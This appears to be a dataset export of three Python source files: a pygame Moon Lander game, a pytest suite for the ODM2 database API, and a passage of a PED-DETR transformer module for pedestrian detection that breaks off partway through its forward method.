text stringlengths 957 885k |
|---|
#Moon Lander, where we try to land in 1 of the 3 landing pads, and keep speed under 2 m/s
import pygame
from pygame.locals import *
import sys
import random
import pygwidgets
import pyghelpers
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
GREEN = (0, 255, 0)
ORANGE = (255, 100, 0)
GREENISH_YELLOW = (150, 255, 0)
GREENISH = (10,200,125)
WINDOW_WIDTH = 1600
WINDOW_HEIGHT = 900
MAX_WIDTH = WINDOW_WIDTH - 100
MAX_HEIGHT = WINDOW_HEIGHT - 100
FRAMES_PER_SECOND = 30
MOON_START = WINDOW_HEIGHT - 50
LANDED_SAFE = 'landedSafe'
LANDED_WITH_INJURIES = 'landedWithInjuries'
LANDED_CRASHED = 'landedCrashed'
LANDED_NOT = 'landedNot'
GAME_FLYING = 'gameFlying'
GAME_JUST_LANDED = 'gameJustLanded'
GAME_SHOWING_DIALOG = 'gameShowingDialog'
# CONSTANTS
LANDER_MASS = 1
LANDER_FUEL = 100
SPEED_LIMIT = 2.00
PLANET_MASS = 7.347 * (10 ** 8)
PLANET_RADIUS = 1.079
GRAVITY_CONSTANT = 6.673 * (10 ** -11)
GRAVITY = (GRAVITY_CONSTANT * LANDER_MASS * PLANET_MASS)/ (PLANET_RADIUS ** 2)
class FuelGauge(object):
def __init__(self, window):
self.window = window
self.outerRect = pygame.Rect(725, WINDOW_HEIGHT - 30, 150, 40)
self.thermometerRange = pygame.Rect(750 - 1, WINDOW_HEIGHT - 15, 102, 12)
self.thermometer = pygame.Rect(750, WINDOW_HEIGHT - 14, 100, 10)
self.fuelDisplay = pygwidgets.DisplayText(window, (750, WINDOW_HEIGHT - 28), '', \
fontSize=20, textColor=BLACK)
def mDraw(self, fuelAmount):
if fuelAmount < 0:
fuelAmount = 0
self.thermometer.width = int(fuelAmount)
self.fuelDisplay.setValue('Fuel: ' + str(fuelAmount))
if landerFuel >= 90:
color = GREEN
elif landerFuel > 65:
color = GREENISH_YELLOW
elif landerFuel > 45:
color = YELLOW
elif landerFuel > 10:
color = ORANGE
else:
color = RED
pygame.draw.rect(self.window, color, self.outerRect, 0)
self.fuelDisplay.draw()
pygame.draw.rect(self.window, BLACK, self.thermometerRange, 0)
if fuelAmount > 0:
pygame.draw.rect(self.window, WHITE, self.thermometer, 0)
class LandingPad(object):
HEIGHT = 10
def __init__(self, window, landingBonus, color, minX, maxX, maxWidth, minWidth):
self.window = window
self.color = color
self.landingBonus = landingBonus
self.minX = minX
self.maxX = maxX
self.maxWidth = maxWidth
self.minWidth = minWidth
self.mReset()
def mReset(self):
# Create new size and positions for all landing pads
x = random.randrange(self.minX, self.maxX)
width = random.randrange(self.minWidth, self.maxWidth)
self.rect = pygame.Rect(x, MOON_START - 5, width, LandingPad.HEIGHT)
def mIntersects(self, landerRect):
intersects = landerRect.colliderect(self.rect)
if intersects: # check if landed completely inside the landing pad
inside = (landerRect.left >= self.rect.left) and ((landerRect.left + landerRect.width) <= self.rect.left + self.rect.width)
return True, inside
else:
return False, False # does not intersect, and did therefore did not land safely
def mGetBonus(self):
return self.landingBonus
def mDraw(self):
pygame.draw.ellipse(self.window, self.color, self.rect, 0)
class LandingPadMgr(object):
def __init__(self, window, minWidth):
oLandingPad1 = LandingPad(window, 75, YELLOW, 1, 300, 85, minWidth)
oLandingPad2 = LandingPad(window, 50, GREEN, 400, 1150, 160, minWidth + 15) # make larger for easy landing
oLandingPad3 = LandingPad(window, 75, YELLOW, 1300, 1525, 85, minWidth)
self.landingPadList = [oLandingPad1, oLandingPad2, oLandingPad3]
self.mReset()
def mReset(self):
for oLandingPad in self.landingPadList:
oLandingPad.mReset()
def mCheckForLanding(self, landerRect):
for oLandingPad in self.landingPadList:
landed, insidePad = oLandingPad.mIntersects(landerRect)
if landed:
bonus = oLandingPad.mGetBonus()
return bonus, insidePad
return 0, False # signal that it did not land
def mGetBonus(self, whichLandingPad):
oLandingPad = self.landingPadList[whichLandingPad]
self.bonus = oLandingPad.mGetBonus()
return self.bonus
def mDraw(self):
for landingPad in self.landingPadList:
landingPad.mDraw()
class StarField(object):
def __init__(self, window):
self.window = window
self.mReset()
self.earth = pygame.image.load("images/earth.jpg")
def mReset(self):
self.starInfo = []
nStars = random.randrange(25, 50)
for i in range(nStars):
x = random.randrange(0, WINDOW_WIDTH)
y = random.randrange(0, MOON_START)
radius = random.randrange(1, 4)
self.starInfo.append(((x, y), radius))
self.earthLeft = random.randrange(0, WINDOW_WIDTH)
self.earthTop = random.randrange(0, MOON_START)
def mDraw(self):
for thisStarTuple in self.starInfo:
pygame.draw.circle(window, WHITE, (thisStarTuple[0]), thisStarTuple[1])
self.window.blit(self.earth, (self.earthLeft, self.earthTop))
class Lander(object):
STARTING_FUEL = 100
MIN_X = 100
MAX_X = WINDOW_WIDTH - 100
START_Y = 2.0
def __init__(self, window):
self.window = window
self.imageOK = pygame.image.load("images/lander.png")
self.imageCrashed = pygame.image.load("images/landerCrashed.png")
self.imageInjuries = pygame.image.load("images/landerInjuries.png")
self.rect = self.imageOK.get_rect()
self.leftJet = pygame.image.load("images/jetLeft.png")
self.rightJet = pygame.image.load("images/jetRight.png")
self.mainJet = pygame.image.load("images/jetMain.png")
self.leftArrow = pygame.image.load("images/arrowLeft.png")
self.leftArrowLeft = 2
self.leftArrowTop = WINDOW_HEIGHT / 2
self.rightArrow = pygame.image.load("images/arrowRight.png")
self.rightArrowLeft = WINDOW_WIDTH - 47 # so it shows on window
self.rightArrowTop = WINDOW_HEIGHT / 2
self.upArrow = pygame.image.load("images/arrowUp.png")
self.upArrowLeft = WINDOW_WIDTH / 2
self.upArrowTop = 2
self.mReset()
def mReset(self):
self.image = self.imageOK
self.fuel = Lander.STARTING_FUEL
# Need these as floating point, because speed increments are decimal values
self.xSpeed = float(random.randrange(-5, 6))
self.ySpeed = 0.0
self.landerX = float(random.randrange(Lander.MIN_X, Lander.MAX_X))
self.landerY = 2.0
self.rect.left = int(self.landerX)
self.rect.top = self.landerY
self.landed = False
self.leftEngineOn = False
self.rightEngineOn = False
self.mainEngineOn = False
self.jetSoundPlaying = False
self.engineSoundPlaying = True
def mUpdate(self, moveLeftEngineOn, moveRightEngineOn, mainEngineOn):
self.leftEngineOn = moveLeftEngineOn
self.rightEngineOn = moveRightEngineOn
self.mainEngineOn = mainEngineOn
if self.jetSoundPlaying and (not moveRightEngineOn) and (not moveLeftEngineOn):
jetSound.stop()
self.jetSoundPlaying = False
if self.engineSoundPlaying and (not mainEngineOn):
engineSound.stop()
self.engineSoundPlaying = False
if self.fuel > 0:
if self.leftEngineOn:
self.xSpeed = self.xSpeed - .1
self.fuel = self.fuel - .25
if not self.jetSoundPlaying:
jetSound.play(-1) #continuous
self.jetSoundPlaying = True
if self.rightEngineOn:
self.xSpeed = self.xSpeed + .1
self.fuel = self.fuel - .25
if not self.jetSoundPlaying:
jetSound.play(-1)
self.jetSoundPlaying = True
if self.mainEngineOn:
self.ySpeed = self.ySpeed - .25
self.fuel = self.fuel - 1
if not self.engineSoundPlaying:
engineSound.play(-1) #continuous
self.engineSoundPlaying = True
else:
self.leftEngineOn = False
self.rightEngineOn = False
self.mainEngineOn = False
self.landerX = self.landerX + self.xSpeed
self.ySpeed = self.ySpeed + GRAVITY
self.landerY = self.landerY + self.ySpeed
self.rect.left = int(self.landerX)
self.rect.top = int(self.landerY)
return self.rect, self.xSpeed, self.ySpeed
def mDown(self, landedState): # Lander has landed, may have crashed
if landedState == LANDED_CRASHED:
self.image = self.imageCrashed
elif landedState == LANDED_WITH_INJURIES:
self.image = self.imageInjuries
self.ySpeed = 0
self.leftEngineOn = False
self.rightEngineOn = False
self.mainEngineOn = False
self.ySpeed = 0
if self.jetSoundPlaying:
jetSound.stop()
self.jetSoundPlaying = False
if self.engineSoundPlaying:
engineSound.stop()
self.engineSoundPlaying = False
def mGetWidth(self):
return self.rect.width
def mDraw(self):
# Show arrows if off window
if self.rect.left < 0:
self.window.blit(self.leftArrow, (self.leftArrowLeft, self.leftArrowTop))
if self.rect.left > WINDOW_WIDTH:
self.window.blit(self.rightArrow, (self.rightArrowLeft, self.rightArrowTop))
if self.rect.top < 0:
self.window.blit(self.upArrow, (self.upArrowLeft, self.upArrowTop))
# Draw the lander, and any jets that are on
self.window.blit(self.image, self.rect)
if self.leftEngineOn:
self.window.blit(self.rightJet, (self.rect.left, self.rect.top))
if self.rightEngineOn:
self.window.blit(self.leftJet, (self.rect.left, self.rect.top))
if self.mainEngineOn:
self.window.blit(self.mainJet, (self.rect.left, self.rect.top))
def mGetFuel(self):
return self.fuel
def mGetYSpeed(self):
return self.ySpeed
#Initialize pygame
pygame.mixer.pre_init(44100, -16, 2, 2048) # setup mixer to avoid sound lag
pygame.init()
window= pygame.display.set_mode([WINDOW_WIDTH, WINDOW_HEIGHT])
gameFont = pygame.font.SysFont("monospaces", 30)
endFont = pygame.font.SysFont("monospaces", 60)
fuelFont = pygame.font.SysFont("monospaces", 20)
oLander = Lander(window)
minLandingPadSize = oLander.mGetWidth() + 5
oLandingPadMgr = LandingPadMgr(window, minLandingPadSize)
oStarField = StarField(window)
oFuelGauge = FuelGauge(window)
gameState = GAME_FLYING
landedState = LANDED_NOT
# Score
score = 0
#The ground
moon = pygame.image.load("images/moon.png")
austronaut = pygame.image.load("images/astronaut.png")
liveSpeedX = pygwidgets.DisplayText(window, (500, MOON_START + 20), '', \
fontSize=30, textColor=GREEN)
liveSpeedY = pygwidgets.DisplayText(window, (900, MOON_START + 20), '', \
fontSize=30, textColor=GREEN)
scoreText = pygwidgets.DisplayText(window, (10, MOON_START + 20), '', \
fontSize=30, textColor=GREEN)
countUpTimerField = pygwidgets.DisplayText(window, (WINDOW_WIDTH - 150, MOON_START + 20, ), '0', \
fontSize=30, textColor=GREEN)
# Stuff dealing with dialog box when one round of the game is done
messageDisplay = pygwidgets.DisplayText(window, (565, 290), '', \
fontSize=48, textColor=BLACK)
speedDisplay = pygwidgets.DisplayText(window, (565, 340), '', \
fontSize=48, textColor=BLACK)
newSoftestField = pygwidgets.DisplayText(window, (565, 390), '', \
fontSize=48, textColor=BLACK)
newFastestField = pygwidgets.DisplayText(window, (565, 440), '', \
fontSize=48, textColor=BLACK)
playAgainDisplay = pygwidgets.DisplayText(window, (690, 550), 'Play again?', \
fontSize=48, textColor=BLACK)
startButton = pygwidgets.TextButton(window, (750, 610), 'Start', width=60, height=30)
yesButton = pygwidgets.TextButton(window, (720, 610), 'Yes', width=60, height=30)
noButton = pygwidgets.TextButton(window, (820, 610), 'No', width=60, height=30)
DATA_FILE_PATH = 'LanderData.txt'
# Data file will be made of two entries - separated by a comma:
# <softestSoFar>,<fastestSoFar>
if pyghelpers.fileExists(DATA_FILE_PATH):
savedDataString = pyghelpers.readFile(DATA_FILE_PATH)
savedDataList = savedDataString.split(',')
softestSoFar = float(savedDataList[0])
fastestSoFar = float(savedDataList[1])
else: #first time, set some outrageous values
softestSoFar = 10000.
fastestSoFar = 10000.
oCountUpTimer = pyghelpers.CountUpTimer()
clock = pygame.time.Clock() # set the speed (frames per second)
introwindow = pygame.image.load("images/introscreen.png")
jetSound = pygame.mixer.Sound('sounds/jet.wav')
engineSound = pygame.mixer.Sound('sounds/engine.wav')
landedSafelySound = pygame.mixer.Sound('sounds/landedSafely.wav')
crashMinorSound = pygame.mixer.Sound('sounds/crashMinor.wav')
crashMajorSound = pygame.mixer.Sound('sounds/crashMajor.wav')
## Intro window:
waitingToPressStart = True
while waitingToPressStart:
for event in pygame.event.get():
# check if the event is the X button
if event.type == pygame.QUIT:
# if it is quit the game
pygame.quit()
sys.exit()
if startButton.handleEvent(event):
oLander.mReset()
oLandingPadMgr.mReset()
oStarField.mReset()
gameState = GAME_FLYING
landedState = LANDED_NOT
oCountUpTimer.start()
waitingToPressStart = False # start up
# Draw star field, moon, control text, landing pads, lander, and control text
oStarField.mDraw()
window.blit(moon, (0, MOON_START))
landerFuel = oLander.mGetFuel()
oFuelGauge.mDraw(landerFuel)
scoreText.draw()
oLandingPadMgr.mDraw()
oLander.mDraw()
window.blit(introwindow, (400, 200))
startButton.draw()
# update the window
pygame.display.update()
# slow things down a bit
clock.tick(FRAMES_PER_SECOND) # make PyGame wait the correct amount
## MAIN PLAYING LOOP
# 4 - Loop forever
while True:
# 5 - loop through the events
for event in pygame.event.get():
# check if the event is the X button
if event.type == pygame.QUIT:
# if it is quit the game
pygame.quit()
sys.exit()
if gameState == GAME_SHOWING_DIALOG:
if yesButton.handleEvent(event):
oLander.mReset()
oLandingPadMgr.mReset()
oStarField.mReset()
gameState = GAME_FLYING
landedState = LANDED_NOT
oCountUpTimer.start()
if noButton.handleEvent(event):
pygame.quit()
sys.exit()
else: # not landed
#Moving the lander
keyPressedList = pygame.key.get_pressed()
landerRect, landerXSpeed, landerYSpeed = oLander.mUpdate(keyPressedList[pygame.K_LEFT], keyPressedList[K_RIGHT], keyPressedList[K_UP])
landerXSpeed = round(landerXSpeed, 4)
landerYSpeed = round(landerYSpeed, 4)
bonusForLandingOnPad, landedInsidePad = oLandingPadMgr.mCheckForLanding(landerRect) # 0 if not landed, otherwise bonus
if bonusForLandingOnPad > 0:
gameState = GAME_JUST_LANDED
if landerYSpeed < SPEED_LIMIT:
if landedInsidePad :
landedState = LANDED_SAFE
score = score + bonusForLandingOnPad
else:
landedState = LANDED_WITH_INJURIES
else:
landedState = LANDED_CRASHED
score = score - 10
oLander.mDown(landedState)
oCountUpTimer.stop()
if gameState == GAME_FLYING: #check for collision on moon
if (landerRect.top + landerRect.height) > MOON_START:
gameState = GAME_JUST_LANDED
score = score - 10
landedState = LANDED_CRASHED
oLander.mDown(landedState)
oCountUpTimer.stop()
if gameState == GAME_FLYING:
liveSpeedX.setValue('Hor. Speed: ' + str(landerXSpeed) + ' m/s')
liveSpeedY.setValue('Vert. Speed: ' + str(landerYSpeed) + 'm/s')
if gameState == GAME_JUST_LANDED: # only runs once
liveSpeedX.setValue('')
liveSpeedY.setValue('')
if landedState == LANDED_SAFE:
messageDisplay.setValue('Safe landing!')
landedSafelySound.play()
elif landedState == LANDED_WITH_INJURIES:
messageDisplay.setValue('Landed, but there are injuries')
crashMinorSound.play()
else: # LANDED_CRASHED
messageDisplay.setValue('Crashed! No survivors')
crashMajorSound.play()
speedDisplay.setValue('Landing speed: ' + str(landerYSpeed))
writeDataFile = False
newSoftestField.setValue('')
newFastestField.setValue('')
if (bonusForLandingOnPad > 0) and (landedState != LANDED_CRASHED):
if landerYSpeed < softestSoFar:
softestSoFar = landerYSpeed
newSoftestField.setValue('New softest landing: ' + str(softestSoFar))
writeDataFile = True
seconds = oCountUpTimer.getTime()
if seconds < fastestSoFar:
fastestSoFar = seconds
newFastestField.setValue('New fastest landing: ' + str(fastestSoFar))
writeDataFile = True
if writeDataFile:
dataList = [str(softestSoFar), str(fastestSoFar)]
dataString = ','.join(dataList)
print('Writing file')
pyghelpers.writeFile(DATA_FILE_PATH, dataString)
gameState = GAME_SHOWING_DIALOG
scoreText.setValue("Score: " + str(score))
sec = oCountUpTimer.getTime() # ask the clock object for the elapsed time
countUpTimerField.setValue('Time: ' + str(sec)) # put that into a text field
# 6 - clear the window before drawing it again
window.fill(BLACK)
# Draw star field, moon, control text, landing pads, lander, and control text
oStarField.mDraw()
window.blit(moon, (0, MOON_START))
landerFuel = oLander.mGetFuel()
oFuelGauge.mDraw(landerFuel)
liveSpeedX.draw()
liveSpeedY.draw()
scoreText.draw()
countUpTimerField.draw()
oLandingPadMgr.mDraw()
oLander.mDraw()
if gameState == GAME_SHOWING_DIALOG:
pygame.draw.rect(window, WHITE, (400, 200, 800, 500))
if landedState == LANDED_SAFE:
window.blit(austronaut, (oLander.rect.left + 50, MOON_START - 18))
newSoftestField.draw()
newFastestField.draw()
elif landedState == LANDED_WITH_INJURIES:
newSoftestField.draw()
newFastestField.draw()
else: # LANDED_CRASHED
pass # nothing
messageDisplay.draw()
speedDisplay.draw()
playAgainDisplay.draw()
yesButton.draw()
noButton.draw()
# 8 - update the window
pygame.display.update()
# 9 slow things down a bit
clock.tick(FRAMES_PER_SECOND) # make PyGame wait the correct amount
|
<reponame>LimnoTech/ODM2PythonAPI
from __future__ import (absolute_import, division, print_function)
from odm2api.ODMconnection import dbconnection
from odm2api.models import (Methods, Models, People,
ProcessingLevels, RelatedModels, Variables)
from odm2api.services.createService import CreateODM2
from odm2api.services.deleteService import DeleteODM2
from odm2api.services.readService import ReadODM2
from odm2api.services.updateService import UpdateODM2
import pytest
from tests import test_connection as testConnection
__author__ = ['<NAME>', '<NAME>']
xfail = pytest.mark.xfail
skipif = xfail = pytest.mark.skipif
dbs = testConnection.dbs_test
class odmConnection():
pass
@pytest.fixture(scope='function', params=dbs)
def setup(request):
# build an empty database for testing
# conn = dbconnection.createConnection('sqlite', ':memory:')
db = request.param
print('dbtype', db[0], db[1])
session_factory = dbconnection.createConnection(db[1], db[2], db[3], db[4], db[5], echo=False)
assert session_factory is not None, ('failed to create a session for ', db[0], db[1])
assert session_factory.engine is not None, ('failed: session has no engine ', db[0], db[1])
# dbconnection._setSchema(conn.engine)
dbConn = odmConnection
# build connectors for read, write, update, and delete operations
dbConn.odmread = ReadODM2(session_factory)
dbConn.odmcreate = CreateODM2(session_factory)
dbConn.odmupdate = UpdateODM2(session_factory)
dbConn.odmdelete = DeleteODM2(session_factory)
s = session_factory.getSession()
if (db[2] == ':memory:'):
build = open('./tests/schemas/sqlite/ODM2_for_SQLite.sql').read()
for line in build.split(';\n'):
s.execute(line)
s.flush()
print('database initialization completed successfully')
def fin():
print('teardown odm2 test connection')
del dbConn.odmread
del dbConn.odmcreate
del dbConn.odmupdate
del dbConn.odmdelete
session_factory.engine.dispose()
session_factory.test_engine.dispose()
s.invalidate()
request.addfinalizer(fin)
return dbConn
@pytest.mark.skipif(True, reason='Enable for testing: CreateService Session closes on failed create #52')
def test_SessionNotFailed(setup):
setup.odmcreate.createPerson(
firstName='tony',
lastName='castronova',
middleName='michael'
)
with pytest.raises(Exception) as excinfo:
# this one should fail due to a not null constraint
setup.odmcreate.createPerson(firstName=None,
lastName='castronova',
middleName='michael')
assert 'NULL' in str(excinfo.value)
# now add again
setup.odmcreate.createPerson(firstName='tony',
lastName='castronova',
middleName=None)
setup.odmcreate.createPerson(
firstName='john',
lastName='doe'
)
people = setup.odmread.getPeople()
assert len(people) == 3, 'People should have been 3'
def test_createPerson(setup):
# create some people
p1 = People(PersonFirstName='tony', PersonLastName='castronova', PersonMiddleName='Michael')
p2 = People(PersonFirstName='tony', PersonLastName='castronova')
p3 = People(PersonFirstName='john', PersonLastName='doe')
setup.odmcreate.createPerson(p1)
setup.odmcreate.createPerson(p2)
setup.odmcreate.createPerson(p3)
people = setup.odmread.getPeople()
assert len(people) == 3, 'People should have been 3'
def test_personFail(setup):
with pytest.raises(Exception) as excinfo:
# this one should fail due to a not null constraint
p1 = People(PersonFirstName=None, PersonLastName='doe', PersonMiddleName='john')
setup.odmcreate.createPerson(p1)
assert 'null' in str(excinfo.value).lower()
def test_createVariable(setup):
v1 = Variables(VariableCode='Phos_TOT',
VariableNameCV='Phosphorus, total dissolved',
VariableTypeCV='Hydrology',
NoDataValue=-999,
SpeciationCV=None,
VariableDefinition=None)
v2 = Variables(VariableCode='Phos_TOT2',
VariableNameCV='Phosphorus, total dissolved',
VariableTypeCV='Hydrology',
NoDataValue=-999,
SpeciationCV='mg/L',
VariableDefinition=None)
v3 = Variables(VariableCode='Phos_TOT3',
VariableNameCV='Phosphorus, total dissolved',
VariableTypeCV='Hydrology',
NoDataValue=-999,
SpeciationCV=None,
VariableDefinition='some definition')
# create some variables
setup.odmcreate.createVariable(v1)
setup.odmcreate.createVariable(v2)
setup.odmcreate.createVariable(v3)
variables = setup.odmread.getVariables()
print(variables)
assert len(variables) == 3
with pytest.raises(Exception) as excinfo:
# insert duplicate
setup.odmcreate.createVariable(
Variables(
VariableCode='Phos_TOT',
VariableNameCV='Phosphorus, total dissolved',
VariableTypeCV='Hydrology',
NoDataValue=-999,
SpeciationCV=None,
VariableDefinition=None
)
)
assert 'unique' in str(excinfo.value).lower()
def test_createMethod(setup):
m1 = Methods(MethodCode='mycode',
MethodName='my test method',
MethodTypeCV='Unknown',
MethodDescription='method description',
MethodLink=None,
OrganizationID=None)
m2 = Methods(MethodCode='mycode2',
MethodName='my test method',
MethodTypeCV='Unknown',
MethodDescription='method description',
MethodLink=None,
OrganizationID=1)
m3 = Methods(MethodCode='mycode3',
MethodName='my test method',
MethodTypeCV='Unknown',
MethodDescription=None,
MethodLink=None,
OrganizationID=None)
setup.odmcreate.createMethod(m1)
setup.odmcreate.createMethod(m2)
setup.odmcreate.createMethod(m3)
methods = setup.odmread.getMethods()
assert len(methods) == 3
def test_ProcessingLevel(setup):
pl = ProcessingLevels(ProcessingLevelCode='testlevel',
Definition='this is a test processing level',
Explanation=None)
setup.odmcreate.createProcessingLevel(pl)
res = setup.odmread.getProcessingLevels()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createSamplingFeature(setup):
res = setup.odmread.getSamplingFeatures()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createUnit(setup):
res = setup.odmread.getUnits()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createOrganization(setup):
res = setup.odmread.getOrganizations()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createAffiliation(setup):
res = setup.odmread.getAffiliationsByPerson()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createDataset(setup):
res = setup.odmread.getDataSets()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createDatasetResults(setup):
res = setup.odmread.getProcessingLevels()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createAction(setup):
# todo: this function is missing
# res = self.odmread.getActions()
assert 0 == 1
@skipif(True, reason='Needs data')
def test_createActionBy(setup):
# todo; this function is missing
# res = self.odmread.getActionsBy()
assert 0 == 1
@skipif(True, reason='Needs data')
def test_createFeatureAction(setup):
# todo: this function is missing
# res = self.odmread.getFeatureActions()
assert 0 == 1
@skipif(True, reason='Needs data')
def test_createResult(setup):
res = setup.odmread.getResults()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createTimeSeriesResult(setup):
res = setup.odmread.getTimeSeriesResults()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createTimeSeriesResultValues(setup):
res = setup.odmread.getTimeSeriesResultValues()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createSite(setup):
res = setup.odmread.getAllSites()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createSpatialReference(setup):
res = setup.odmread.getSpatialReferenceByCode()
assert len(res) == 1
@skipif(True, reason='Needs data')
def test_createDeploymentAction(setup):
res = setup.odmread.getAllDeploymentAction()
assert len(res) == 1
def test_createModel(setup):
mod1 = Models(ModelCode='converter',
ModelName='mymodel',
ModelDescription='my test converter')
mod2 = Models(ModelCode='model2',
ModelName='mymodel',
ModelDescription=None)
mod3 = Models(ModelCode='converter',
ModelName='mymodel2',
ModelDescription='my test model2')
# create converter (expected: record inserted)
setup.odmcreate.createModel(mod1)
# create with no description (expected: record inserted)
setup.odmcreate.createModel(mod2)
res = setup.odmread.getModels()
assert len(res) == 2
res = setup.odmread.getModels(codes=['converter'])
assert res is not None
assert res[0].ModelCode == 'converter'
with pytest.raises(Exception) as excinfo:
# create converter with duplicate code (expected: fail to insert record)
setup.odmcreate.createModel(mod3)
assert 'unique' in str(excinfo.value).lower()
def test_createRelatedModel(setup):
# create a relationship type
setup.odmcreate.getSession().execute(
'insert into cv_relationshiptype values ("coupled", "coupled converter", "models that have been coupled together", "modeling", NULL)' # noqa
)
mod1 = Models(ModelCode='converter',
ModelName='mymodel',
ModelDescription='my test converter')
mod2 = Models(ModelCode='model2',
ModelName='mymodel',
ModelDescription='my test model2')
# create converter (expected: record inserted)
m1 = setup.odmcreate.createModel(mod1)
# create converter (expected: record inserted)
m2 = setup.odmcreate.createModel(mod2)
rm = RelatedModels(ModelID=m1.ModelID,
RelatedModelID=m2.ModelID,
RelationshipTypeCV='Is part of')
# create related records
setup.odmcreate.createRelatedModel(rm)
m1r = setup.odmread.getModels(codes=['converter'])
assert m1r is not None
assert m1r[0].ModelCode == 'converter'
m2r = setup.odmread.getModels(codes=['model2'])
assert m2r is not None
assert m2r[0].ModelCode == 'model2'
m1rel = setup.odmread.getRelatedModels(code='converter')
assert len(m1rel) == 1
m2rel = setup.odmread.getRelatedModels(code='model2')
assert len(m2rel) == 0
@skipif(True, reason='Needs data')
def test_createSimulation(setup):
res = setup.odmread.getAllSimulations()
assert len(res) == 1
|
<reponame>Hatmm/PED-DETR-for-Pedestrian-Detection<gh_stars>10-100
# ------------------------------------------------------------------------
# Modified by <NAME>
# Modified from Deformable-DETR (https://github.com/fundamentalvision/Deformable-DETR)
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
from typing import Optional
from dqrf.ops.functions.local_attn import MultiHeadAttention
from dqrf.ops.functions.ms_deform_attn import SamplingAttention_RA, SamplingEncAttention, SamplingAttention_dec
import torch
from torch import nn, Tensor
from torch.nn.init import xavier_uniform_, constant_, normal_
from dqrf.utils.box_ops import box_cxcywh_to_xyxy, generalized_box_iou
from dqrf.utils.utils import _get_clones, _get_activation_fn
class Transformer(nn.Module):
def __init__(self, cfg):
super().__init__()
d_model = cfg.MODEL.DQRF_DETR.HIDDEN_DIM
nhead = cfg.MODEL.DQRF_DETR.NHEAD
num_decoder_layers = cfg.MODEL.DQRF_DETR.NUM_DECODER_LAYERS
num_encoder_layers = cfg.MODEL.DQRF_DETR.NUM_ENCODER_LAYERS
dim_feedforward = cfg.MODEL.DQRF_DETR.DIM_FEEDFORWARD
activation = cfg.MODEL.DQRF_DETR.ACTIVATION
dropout = cfg.MODEL.DQRF_DETR.DROPOUT
return_intermediate_dec = cfg.MODEL.DQRF_DETR.AUX_LOSS
self.return_intermediate_dec = return_intermediate_dec
num_feature_levels = cfg.MODEL.DQRF_DETR.NUM_FEATURE_LEVELS
enc_sampling_points = cfg.MODEL.DQRF_DETR.ENC_SAMPLING_POINTS
dec_sampling_points = cfg.MODEL.DQRF_DETR.DEC_SAMPLING_POINTS
dense_query = cfg.MODEL.DQRF_DETR.DENSE_QUERY
rectified_attention = cfg.MODEL.DQRF_DETR.RECTIFIED_ATTENTION
self.zero_tgt = False
checkpoint_enc_ffn = True
checkpoint_dec_ffn = True
self.d_model = d_model
self.num_decoder_layers = num_decoder_layers
encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward,
dropout, activation,
enc_sampling_points=enc_sampling_points,
checkpoint_ffn=checkpoint_enc_ffn,
num_feature_levels=num_feature_levels)
self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers)
decoder_layer = TransformerDecoderLayer(d_model, nhead, dim_feedforward,dropout, activation,
num_feature_levels=num_feature_levels, dec_sampling_points=dec_sampling_points,
checkpoint_ffn=checkpoint_dec_ffn, rectified_attention=rectified_attention)
decoder_norm = nn.LayerNorm(d_model)
self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, dense_query=dense_query, norm=decoder_norm, return_intermediate=return_intermediate_dec)
self._reset_parameters()
self.sampling_cens = nn.Linear(d_model, 4)
constant_(self.sampling_cens.weight.data, 0.)
constant_(self.sampling_cens.bias.data, 0.)
xavier_uniform_(self.sampling_cens.weight.data[:2], gain=1.0)
constant_(self.sampling_cens.bias.data[2:3], -2.0)
constant_(self.sampling_cens.bias.data[3:4], -1.5)
# constant_(self.sampling_cens.bias.data[2:], -2.0)
self.level_embed = nn.Parameter(torch.Tensor(num_feature_levels, d_model))
normal_(self.level_embed)
def _reset_parameters(self):
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
for m in self.modules():
if isinstance(m, (SamplingAttention_RA, SamplingEncAttention, SamplingAttention_dec)):
m._reset_parameters()
def get_valid_size(self, key_padding_mask, N_, H_, W_):
valid_H = torch.sum(~key_padding_mask[:, :, 0], 1)
valid_W = torch.sum(~key_padding_mask[:, 0, :], 1)
valid_size = torch.cat([valid_W.unsqueeze(-1), valid_H.unsqueeze(-1)], 1).view(N_, 2)
size = torch.tensor([W_, H_], dtype=torch.float32, device=key_padding_mask.device)
valid_scale = valid_size / size.view(1, 2)
return valid_size, valid_scale
def forward(self, srcs, masks, query_embed, pos_embeds):
src_flatten = []
mask_flatten = []
lvl_pos_embed_flatten = []
spatial_shapes = []
valid_size_list = []
valid_scale_list = []
for lvl, (src, mask, pos_embed) in enumerate(zip(srcs, masks, pos_embeds)):
bs, c, h, w = src.shape
spatial_shape = (h, w)
spatial_shapes.append(spatial_shape)
src = src.flatten(2)
mask = mask.flatten(1)
pos_embed = pos_embed.flatten(2)
valid_size, valid_scale = self.get_valid_size(mask.view(bs, h, w), bs, h, w)
valid_size_list.append(valid_size.view(bs, 1, 2))
valid_scale_list.append(valid_scale.view(bs, 1, 2))
lvl_pos_embed = pos_embed + self.level_embed[lvl].view(1, -1, 1)
lvl_pos_embed_flatten.append(lvl_pos_embed)
src_flatten.append(src)
mask_flatten.append(mask)
src_flatten = torch.cat(src_flatten, -1)
mask_flatten = torch.cat(mask_flatten, -1)
valid_sizes = torch.cat(valid_size_list, 1)
valid_scales = torch.cat(valid_scale_list, 1)
lvl_pos_embed_flatten = torch.cat(lvl_pos_embed_flatten, -1)
spatial_shapes = (spatial_shapes, valid_sizes, valid_scales)
memory = self.encoder(src_flatten, src_key_padding_mask=mask_flatten, pos=lvl_pos_embed_flatten,
spatial_shape=spatial_shapes)
